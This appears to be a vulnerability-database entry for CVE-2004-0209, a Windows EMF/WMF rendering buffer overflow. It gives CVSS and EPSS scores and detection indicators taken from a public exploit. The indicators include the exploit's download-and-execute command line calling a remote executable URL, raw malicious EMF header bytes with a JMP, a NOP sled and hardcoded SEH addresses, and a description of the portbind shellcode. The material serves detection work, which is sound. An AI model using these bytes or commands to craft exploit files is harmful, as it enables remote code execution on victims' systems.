CVE-2004-0209
published 2004-11-03


Priority: P2 (59)
CVSS 2.0: 10 (critical), vector AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: available
EPSS: 62.05% (99.1th percentile)
Unknown vulnerability in the Graphics Rendering Engine processes of Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats that involve "an unchecked buffer."

Affected (1 range)

Vendor      Product               Version range    Fixed in
microsoft   windows_2003_server   (not listed)     (not listed)

Detection & IOCs (extracted from sources)

filename: expl.emf
filename: HOD-ms04032-emf-expl.c
command:  HOD-ms04032-emf-expl.exe expl.emf 2 http://host/file.exe
process:  iexplore.exe
process:  explorer.exe
bytes:    \x01\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4c\x03\x00\x00\x4c\x03\x00\x00\x20\x45\x4d\x46\x00\x00\x01\x00\x40\x00\x00\x00\x0b\x00\x00\x00\x0a\x00\x00\x00\xff\xff\x00\x00\xEB\x12\x90\x90\x90\x90\x90\x90\x9e\x5c\x05\x78\xb4\x73\xed\x77
  • Malicious EMF files crafted by this exploit contain the magic bytes '20 45 4D 46' (" EMF") at offset 0x28 and begin with a short JMP (0xEB 0x12) followed by NOP sleds immediately after the standard EMF header — scan for NOP sleds or JMP instructions embedded in EMF headers.
  • The exploit uses a fixed SEH overwrite address (0x77ed73b4) targeting Windows XP SP1 and a fixed ROP/call gadget (0x78055c9e) in rpcrt4.dll — these hardcoded addresses in an EMF file are a strong indicator of exploitation.
  • The portbind shellcode payload opens a listener on a user-specified port (XOR-encoded with 0x8888); monitor for unexpected listening ports spawned by iexplore.exe or explorer.exe after rendering an EMF/WMF file.
  • The download-and-execute shellcode variant fetches and runs a remote executable via URL passed as a command-line argument; monitor for iexplore.exe or explorer.exe spawning child processes or making unexpected outbound HTTP connections after EMF rendering.
  • The exploit targets the Graphics Rendering Engine (GRE) via malformed WMF or EMF image formats containing an unchecked buffer — alert on anomalous EMF/WMF files processed by explorer.exe or iexplore.exe, especially those with executable code in the header region.
  • The hardcoded SEH and ROP gadget addresses are specific to Windows XP SP1; the exploit as published does not support Windows 2000 or Windows Server 2003 without modification.
  • The exploit was tested only against Internet Explorer 6.0 SP1 and Explorer (shell); other applications that render EMF/WMF may also be vulnerable but are not covered by this proof-of-concept.